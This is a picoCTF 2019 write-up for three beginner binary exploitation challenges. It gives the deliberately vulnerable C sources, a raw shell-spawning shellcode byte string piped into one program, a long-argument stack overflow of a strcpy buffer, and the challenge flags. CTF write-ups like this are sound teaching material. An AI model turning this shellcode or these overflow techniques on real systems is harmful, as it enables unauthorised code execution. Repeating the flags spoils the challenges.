Binary Writeup
Table of Contents
- handy-shellcode - Points 50
- This program executes any shellcode that you give it. Can you spawn a shell and use that to read the flag.txt? You can find the program in /problems/handy-shellcode_2_6ad1f834bdcf9fcfb41200ca8d0f55a6 on the shell server. Source.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 148
#define FLAGSIZE 128
void vuln(char *buf){
gets(buf);
puts(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
char buf[BUFSIZE];
puts("Enter your shellcode:");
vuln(buf);
puts("Thanks! Executing now...");
((void (*)())buf)();
puts("Finishing Executing Shellcode. Exiting now...");
return 0;
}
Hint: You might be able to find some good shellcode online.
$ uname -a # look the architecture type (ex: x86_64)
# write the shellcode to a file, execute it
# and keep the shell waiting for stdin
$ python -c "print('\xeb\x12\x31\xc9\x5e\x56\x5f\xb1\x15\x8a\x06\xfe\xc8\x88\x06\x46\xe2\xf7\xff\xe7
\xe8\xe9\xff\xff\xff\x32\xc1\x32\xca\x52\x69\x30\x74\x69\x01\x69\x30\x63\x6a\x6f\x8a\xe4\xb1\x0c\xce
\x81')"> ~/shellcode.txt
$ cat ~/shellcode.txt - | ./vuln
picoCTF{ca1cu1at1ng_Mach1n3s_0ecd0}
- Practice-run-1 - Points: 50
- You're going to need to know how to run programs if you're going to get out of here. Navigate to /problems/practice-run-1_0_62b61488e896645ebff9b6c97d0e775e on the shell server and run this program to receive a flag
Hint: How do you execute a program in a command line?
$ chmod +x run_this
$ ./run_this
picoCTF{g3t_r3adY_2_r3v3r53}
- OverFlow 0 - Points: 100
- This should be easy. Overflow the correct buffer in this program and get a flag. Its also found in /problems/overflow-0_1_54d12127b2833f7eab9758b43e88d3b7 on the shell server. Source.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#define FLAGSIZE_MAX 64
char flag[FLAGSIZE_MAX];
void sigsegv_handler(int sig) {
fprintf(stderr, "%s\n", flag);
fflush(stderr);
exit(1);
}
void vuln(char *input){
char buf[128];
strcpy(buf, input);
}
int main(int argc, char **argv){
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
exit(0);
}
fgets(flag,FLAGSIZE_MAX,f);
signal(SIGSEGV, sigsegv_handler);
gid_t gid = getegid();
setresgid(gid, gid, gid);
if (argc > 1) {
vuln(argv[1]);
printf("You entered: %s", argv[1]);
}
else
printf("Please enter an argument next time\n");
return 0;
}
Hint: Find a way to trigger the flag to printIf you try to do the math by hand, maybe try and add a few more characters.
Hint: Sometimes there are things you aren't expecting.
# create a flag.txt file
$ chmod +x ./vuln
$ ./vuln `python -c "print('a'*(10000))"`
# ..and once you got the flag try the same on the server
$ ssh username@2019shell1.picoctf.com
$ cd /path/to/directory
$ ./vuln `python -c "print('a'*(10000))"`
picoCTF{3asY_P3a5yb197d4e2}